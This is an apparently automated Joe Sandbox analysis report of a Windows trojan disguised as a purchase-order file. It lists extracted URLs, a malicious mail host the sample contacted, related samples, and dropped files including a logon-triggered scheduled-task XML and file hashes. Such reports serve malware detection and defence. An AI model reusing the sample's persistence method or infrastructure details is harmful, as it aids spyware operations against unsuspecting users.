                                        https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zipnew order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000002.290045970.0000000003769000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000005.00000000.282084634.0000000000402000.00000040.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000005.00000000.283151659.0000000000402000.00000040.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.fontbureau.comtutanew order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.253839535.000000000566F000.00000004.00000001.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.fontbureau.com=new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.254533956.000000000566C000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.253839535.000000000566F000.00000004.00000001.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		low
                                        http://www.fontbureau.com/designerssnew order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.254877068.0000000005699000.00000004.00000001.sdmpfalse
                                          		high
                                          http://www.jiyu-kobo.co.jp/OsInew order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.250729764.0000000005663000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.249804536.0000000005663000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.fontbureau.comsivanew order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.255093562.000000000566E000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.254906163.000000000566F000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.254979634.000000000566F000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://mail.kyowasecurity.com.sgnew order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000005.00000002.524762835.0000000003112000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.apache.org/licenses/LICENSE-2.0new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.248903417.000000000569E000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000002.292992821.0000000006872000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.248877687.00000000056A1000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.248865129.000000000569E000.00000004.00000001.sdmpfalse
                                            		high
                                            http://www.fontbureau.comnew order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000002.292765423.0000000005660000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.285795268.0000000005660000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000002.292992821.0000000006872000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.255093562.000000000566E000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.254533956.000000000566C000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.254906163.000000000566F000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.253839535.000000000566F000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.254979634.000000000566F000.00000004.00000001.sdmpfalse
                                              		high
                                              http://www.galapagosdesign.com/new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.257088272.0000000005699000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.257018883.0000000005699000.00000004.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://DynDns.comDynDNSnew order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000005.00000002.523008375.0000000002DB1000.00000004.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.fontbureau.comFnew order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.254533956.000000000566C000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.254906163.000000000566F000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.253839535.000000000566F000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.254979634.000000000566F000.00000004.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%hanew order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000005.00000002.523008375.0000000002DB1000.00000004.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://KpGsSw.comnew order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000005.00000002.523008375.0000000002DB1000.00000004.00000001.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.urwpp.deFnew order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.255093562.000000000566E000.00000004.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.fontbureau.comVsFnew order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.255093562.000000000566E000.00000004.00000001.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.fontbureau.comzananew order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.252725051.000000000566E000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.252931728.000000000566F000.00000004.00000001.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.jiyu-kobo.co.jp/jp/new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.250729764.0000000005663000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.250336903.000000000566D000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.250373934.0000000005663000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.250906706.000000000566C000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.250202745.000000000566D000.00000004.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.fontbureau.comanew order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.253839535.000000000566F000.00000004.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.fontbureau.comdnew order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.255093562.000000000566E000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.256209853.000000000566C000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.254906163.000000000566F000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.256055028.000000000566E000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.254979634.000000000566F000.00000004.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.carterandcone.comlnew order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000002.292992821.0000000006872000.00000004.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.founder.com.cn/cn/new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.248332429.0000000005699000.00000004.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.fontbureau.com/designers/cabarga.htmlNnew order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000002.292992821.0000000006872000.00000004.00000001.sdmpfalse
                                                		high
                                                http://www.founder.com.cn/cnnew order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000002.292992821.0000000006872000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.248100348.000000000569A000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.248045051.0000000005699000.00000004.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.jiyu-kobo.co.jp/msnew order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.250729764.0000000005663000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.250373934.0000000005663000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.250906706.000000000566C000.00000004.00000001.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.fontbureau.com/designers/frere-jones.htmlnew order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000002.292992821.0000000006872000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.253657790.0000000005699000.00000004.00000001.sdmpfalse
                                                  		high
                                                  http://www.fontbureau.com/designers/cabarga.htmlnew order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.254533956.000000000566C000.00000004.00000001.sdmpfalse
                                                    		high
                                                    http://www.fontbureau.comcomFnew order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.255093562.000000000566E000.00000004.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://www.jiyu-kobo.co.jp/new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.250202745.000000000566D000.00000004.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://www.fontbureau.com/designers8new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000002.292992821.0000000006872000.00000004.00000001.sdmpfalse
                                                      		high
                                                      http://www.fontbureau.com/designers/jnew order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.252494210.0000000005699000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.252547005.0000000005699000.00000004.00000001.sdmpfalse
                                                        		high
                                                        http://www.fontbureau.com/designers6new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.254671506.0000000005699000.00000004.00000001.sdmpfalse
                                                          		high
                                                          http://www.fontbureau.com/designers/cabarga.htmlrpQjnew order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.254533956.000000000566C000.00000004.00000001.sdmpfalse
                                                            		high
                                                            http://www.fontbureau.comdrsnew order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.253839535.000000000566F000.00000004.00000001.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.jiyu-kobo.co.jp/jp/OsInew order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.250906706.000000000566C000.00000004.00000001.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.jiyu-kobo.co.jp/anew order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.250202745.000000000566D000.00000004.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            		unknown
                                                            http://www.fontbureau.com/designers/new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.252695500.0000000005699000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.252577474.000000000569C000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.252494210.0000000005699000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.252547005.0000000005699000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.252614032.0000000005699000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.252799955.0000000005699000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.252653993.0000000005699000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.252756029.0000000005699000.00000004.00000001.sdmpfalse
                                                              		high
                                                              http://www.jiyu-kobo.co.jp/VsFnew order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.250729764.0000000005663000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.250336903.000000000566D000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.250373934.0000000005663000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.250906706.000000000566C000.00000004.00000001.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.galapagosdesign.com/3smnew order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.257184730.000000000566E000.00000004.00000001.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown

                                                              Contacted IPs

                                                              • No. of IPs < 25%
                                                              • 25% < No. of IPs < 50%
                                                              • 50% < No. of IPs < 75%
                                                              • 75% < No. of IPs

                                                              Public

                                                              IPDomainCountryFlagASNASN NameMalicious
                                                              113.197.35.43
                                                              		mail.kyowasecurity.com.sgSingapore
                                                              		38532USONYX-AS-APUSONYXPTELTDSGtrue

                                                              General Information

                                                              Joe Sandbox Version:34.0.0 Boulder Opal
                                                              Analysis ID:532730
                                                              Start date:02.12.2021
                                                              Start time:16:48:50
                                                              Joe Sandbox Product:CloudBasic
                                                              Overall analysis duration:0h 10m 0s
                                                              Hypervisor based Inspection enabled:false
                                                              Report type:full
                                                              Sample file name:new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe
                                                              Cookbook file name:default.jbs
                                                              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                              Number of analysed new started processes analysed:21
                                                              Number of new started drivers analysed:0
                                                              Number of existing processes analysed:0
                                                              Number of existing drivers analysed:0
                                                              Number of injected processes analysed:0
                                                              Technologies:
                                                              • HCA enabled
                                                              • EGA enabled
                                                              • HDC enabled
                                                              • AMSI enabled
                                                              Analysis Mode:default
                                                              Analysis stop reason:Timeout
                                                              Detection:MAL
                                                              Classification:mal100.troj.spyw.evad.winEXE@6/3@1/1
                                                              EGA Information:Failed
                                                              HDC Information:
                                                              • Successful, ratio: 0.6% (good quality ratio 0.3%)
                                                              • Quality average: 34.4%
                                                              • Quality standard deviation: 37.2%
                                                              HCA Information:
                                                              • Successful, ratio: 100%
                                                              • Number of executed functions: 79
                                                              • Number of non-executed functions: 23
                                                              Cookbook Comments:
                                                              • Adjust boot time
                                                              • Enable AMSI
                                                              • Found application associated with file extension: .exe
                                                              Warnings:
                                                              Show All
                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe
                                                              • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, client.wns.windows.com, fs.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
                                                              • Not all processes where analyzed, report is missing behavior information
                                                              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                              • VT rate limit hit for: /opt/package/joesandbox/database/analysis/532730/sample/new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe

                                                              Simulations

                                                              Behavior and APIs

                                                              TimeTypeDescription
                                                              16:49:58API Interceptor614x Sleep call for process: new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe modified

                                                              Joe Sandbox View / Context

                                                              IPs

                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                              113.197.35.43AWB#8001187 SHIPPING DOCUMENTS PL+BL+CI.exeGet hashmaliciousBrowse
                                                                SHIPMENT DOCUMENTS FOR 912 INVOICE - PL+CI+BL+ORIGINCERT.exeGet hashmaliciousBrowse
                                                                  urgent request fro quotation CONO GROUP LLC DK983746GT.exeGet hashmaliciousBrowse

                                                                    Domains

                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                    mail.kyowasecurity.com.sgAWB#8001187 SHIPPING DOCUMENTS PL+BL+CI.exeGet hashmaliciousBrowse
                                                                    • 113.197.35.43
                                                                    SHIPMENT DOCUMENTS FOR 912 INVOICE - PL+CI+BL+ORIGINCERT.exeGet hashmaliciousBrowse
                                                                    • 113.197.35.43
                                                                    urgent request fro quotation CONO GROUP LLC DK983746GT.exeGet hashmaliciousBrowse
                                                                    • 113.197.35.43

                                                                    ASN

                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                    USONYX-AS-APUSONYXPTELTDSG(SA213-317L)_INHA_20211122.exeGet hashmaliciousBrowse
                                                                    • 103.7.9.22
                                                                    zhaP868fw5Get hashmaliciousBrowse
                                                                    • 43.229.194.252
                                                                    lDawzTbABcGet hashmaliciousBrowse
                                                                    • 43.229.194.215
                                                                    juxSAmZoqxGet hashmaliciousBrowse
                                                                    • 103.36.93.250
                                                                    Ynffczq7m4Get hashmaliciousBrowse
                                                                    • 43.229.194.223
                                                                    RFQ_LISTaugust2315.exeGet hashmaliciousBrowse
                                                                    • 103.7.8.203
                                                                    loligang.x86Get hashmaliciousBrowse
                                                                    • 43.229.193.74
                                                                    TFG18FA4eDGet hashmaliciousBrowse
                                                                    • 43.229.194.255
                                                                    Order 824126.xlsbGet hashmaliciousBrowse
                                                                    • 116.12.51.202
                                                                    Order 161488.xlsbGet hashmaliciousBrowse
                                                                    • 116.12.51.202
                                                                    Order 824126.xlsbGet hashmaliciousBrowse
                                                                    • 116.12.51.202
                                                                    Order 161488.xlsbGet hashmaliciousBrowse
                                                                    • 116.12.51.202
                                                                    Order 46975986.xlsbGet hashmaliciousBrowse
                                                                    • 116.12.51.202
                                                                    PO 97179275.xlsbGet hashmaliciousBrowse
                                                                    • 116.12.51.202
                                                                    Order 46975986.xlsbGet hashmaliciousBrowse
                                                                    • 116.12.51.202
                                                                    Order 2522592.xlsbGet hashmaliciousBrowse
                                                                    • 116.12.51.202
                                                                    PO 97179275.xlsbGet hashmaliciousBrowse
                                                                    • 116.12.51.202
                                                                    Order 2522592.xlsbGet hashmaliciousBrowse
                                                                    • 116.12.51.202
                                                                    AWB#8001187 SHIPPING DOCUMENTS PL+BL+CI.exeGet hashmaliciousBrowse
                                                                    • 113.197.35.43
                                                                    SHIPMENT DOCUMENTS FOR 912 INVOICE - PL+CI+BL+ORIGINCERT.exeGet hashmaliciousBrowse
                                                                    • 113.197.35.43

                                                                    JA3 Fingerprints

                                                                    No context

                                                                    Dropped Files

                                                                    No context

                                                                    Created / dropped Files

                                                                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe.log
                                                                    Process:C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe
                                                                    File Type:ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):1314
                                                                    Entropy (8bit):5.350128552078965
                                                                    Encrypted:false
                                                                    SSDEEP:24:MLU84jE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4sAmEw:MgvjHK5HKXE1qHiYHKhQnoPtHoxHhAHR
                                                                    MD5:1DC1A2DCC9EFAA84EABF4F6D6066565B
                                                                    SHA1:B7FCF805B6DD8DE815EA9BC089BD99F1E617F4E9
                                                                    SHA-256:28D63442C17BF19558655C88A635CB3C3FF1BAD1CCD9784090B9749A7E71FCEF
                                                                    SHA-512:95DD7E2AB0884A3EFD9E26033B337D1F97DDF9A8E9E9C4C32187DCD40622D8B1AC8CCDBA12A70A6B9075DF5E7F68DF2F8FBA4AB33DB4576BE9806B8E191802B7
                                                                    Malicious:true
                                                                    Reputation:high, very likely benign file
                                                                    Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a
                                                                    C:\Users\user\AppData\Local\Temp\tmp8923.tmp
                                                                    Process:C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe
                                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):1645
                                                                    Entropy (8bit):5.172468542885359
                                                                    Encrypted:false
                                                                    SSDEEP:24:2dH4+SEqC/a7hTlNMFpH/rlMhEMjnGpwjpIgUYODOLD9RJh7h8gKBeNtn:cbhC7ZlNQF/rydbz9I3YODOLNdq3e
                                                                    MD5:6D873C913C6BA247539E8D716FDF3A91
                                                                    SHA1:9CDD0F46D6C29970CE6E9D2B60978BD2A4B5419F
                                                                    SHA-256:098DBD4D3FA82AEAD5B22CA909E2FF9281FC1970123DF7952AE43577FB556BC0
                                                                    SHA-512:1683A3EF8053E0E2A8ECE7349CA1E2104164E5D870A9A748DCCD4856CF073CF5B3C088A29D44BD8D354914BC36578F4037B64028396CEB59D0869677DB2061F5
                                                                    Malicious:true
                                                                    Reputation:low
                                                                    Preview: <?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo>.. <Date>2014-10-25T14:27:44.8929027</Date>.. <Author>computer\user</Author>.. </RegistrationInfo>.. <Triggers>.. <LogonTrigger>.. <Enabled>true</Enabled>.. <UserId>computer\user</UserId>.. </LogonTrigger>.. <RegistrationTrigger>.. <Enabled>false</Enabled>.. </RegistrationTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">.. <UserId>computer\user</UserId>.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>LeastPrivilege</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvailable>t
                                                                    C:\Users\user\AppData\Roaming\aUkURZiJ.exe
                                                                    Process:C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe
                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):562688
                                                                    Entropy (8bit):7.620214969982571
                                                                    Encrypted:false
                                                                    SSDEEP:12288:j2KwyZTuK+jJ8CXnZQ6VlgyoRPWHN3dvos/:jhyVpQ6VG+7v
                                                                    MD5:66CBE976594F666D5440264A4084B21F
                                                                    SHA1:944C8819E41AD59333527141A7FD5180253969E1
                                                                    SHA-256:460EB4667362671BE2BE1E94AFE56E73331C3A3CD58B028E49EC135FEC8888A9
                                                                    SHA-512:1EBB035FD7CEAB82F4EE270E66B097958E8B57805897DCAFC4736E82E64961EC5DF61AF8A0EC78D9D119D2EC235D955559CFE360587E46915AA9C5450C93DA1E
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                    • Antivirus: ReversingLabs, Detection: 41%
                                                                    Reputation:low
